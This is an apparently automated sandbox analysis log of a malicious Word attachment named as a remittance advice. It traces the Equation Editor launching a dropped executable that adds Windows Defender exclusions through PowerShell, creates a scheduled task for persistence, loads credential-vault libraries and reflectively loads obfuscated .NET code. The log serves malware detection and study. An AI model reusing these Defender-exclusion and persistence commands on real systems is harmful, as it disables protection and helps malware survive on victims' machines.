Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: credssp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: bcrypt.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: ucrtbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\taskeng.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: SCB REmittance Advice.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\SCB REmittance Advice.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: XRoS.pdb source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr
Source: Binary string: XRoS.pdbSHA256 source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr

Data Obfuscation

barindex
Source: sharonzx[1].exe.2.dr, BufferingPage.cs .Net Code: InitializeComponent
Source: sharon38892.exe.2.dr, BufferingPage.cs .Net Code: InitializeComponent
Source: XxENUzWteJXT.exe.5.dr, BufferingPage.cs .Net Code: InitializeComponent
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs .Net Code: TgFEragjVR System.Reflection.Assembly.Load(byte[])
Source: 5.2.sharon38892.exe.4a0000.0.raw.unpack, LoginForm.cs .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
Source: Yara match File source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR
Source: sharonzx[1].exe.2.dr Static PE information: 0x84844696 [Thu Jun 14 04:35:34 2040 UTC]
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005ECA58 push esp; retf 005Eh 2_2_005ECA59
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005ECA52 push esp; retf 005Eh 2_2_005ECA55
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005DF94D push ebp; retf 2_2_005DF958
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F694F push ecx; ret 2_2_005F695B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F694A push ecx; ret 2_2_005F694B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F6962 push ecx; ret 2_2_005F696B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F691F push ecx; ret 2_2_005F692B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F7C0F push ecx; ret 2_2_005F7C13
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F7C07 push ecx; ret 2_2_005F7C0B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F8028 push eax; ret 2_2_005F8063
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F68FF push ecx; ret 2_2_005F690B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F57FD push edx; ret 2_2_005F57FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F68FA push ecx; ret 2_2_005F68FB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F7BFA push ecx; ret 2_2_005F7C03
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F57F5 push edx; ret 2_2_005F57F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005ECAB8 push eax; retf 2_2_005ECAE1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F68A8 push ecx; ret 2_2_005F68AB
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00258310 push esp; retf 000Ch 5_2_00258311
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_00258757 push esp; retf 000Ch 5_2_00258758
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_002588C9 push esp; retf 000Ch 5_2_002588CA
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_0025AA19 push esp; retf 5_2_0025AA25
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_0025BFA4 pushad ; ret 5_2_0025BFA5
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_046F1E30 pushad ; iretd 5_2_046F1E32
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Code function: 5_2_046F1EBB pushad ; iretd 5_2_046F1EBC
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00178310 push esp; retf 000Dh 14_2_00178311
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_00178757 push esp; retf 000Dh 14_2_00178758
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_001788C9 push esp; retf 000Dh 14_2_001788CA
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 14_2_0017BFA4 pushad ; ret 14_2_0017BFA5
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 21_2_00402AC0 push eax; ret 21_2_00402AD4
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 21_2_00402AC0 push eax; ret 21_2_00402AFC
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, GUUGstbSmd7OI8KM1Z.cs High entropy of concatenated method names: 'ScxvcCwM93', 'JSjv0WZnHM', 'S7Rv8uPWUA', 'MJH8P881xY', 'ps68zOGFla', 'hRfvF13YYQ', 'V42vBpwSdJ', 'E4uvWMKP0X', 'OBnvoOQmPT', 'sU4vErX1FD'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, b9j79nOrpIpE4FqpJQ.cs High entropy of concatenated method names: 'XtGAkSaEQv', 'TEDA4VHdb6', 'PFFAmRsGLp', 'K4YApyJtsh', 'l8gAxXTgrc', 'inpAZpOCxL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, HQuwQYBFxJiq99eTsrP.cs High entropy of concatenated method names: 'mBNVdR9bEU', 'wcAVycFScX', 'cYOVrUkpsJ', 'I48VJHMWX6', 'C8dVMLWuYp', 'NRdVsJoFVj', 'ievVTNu9Dp', 'AaCVnfmAKl', 'WovVtRwyU6', 'HoXVC7c3nA'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, Fa2mLkxDVcED3b2JhR.cs High entropy of concatenated method names: 'bsNYlgssgH', 'FPVYS7eMYr', 'c38YxJvmQu', 'tdNYU0Jt0v', 'ot6Y4wSe4a', 'lMyYmhQBWH', 'ssVYpkcaRp', 'dUeYZYYQr9', 'L08YuPAnBm', 'As6YbrNsSL'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, q2eJsEEhft2IWeOyJV.cs High entropy of concatenated method names: 'fQ0BvxLwNx', 'fkfBgXAmWX', 'CbrBRGgGYv', 'QjTBQYSDTK', 'uK3BYdgdrn', 'cZGBasLgoJ', 'C7vyn8CuH4FBIjpWB3', 'htqMA5whJ5pnaJbvfH', 'tQmBBrHWWJ', 'KQHBoEop79'
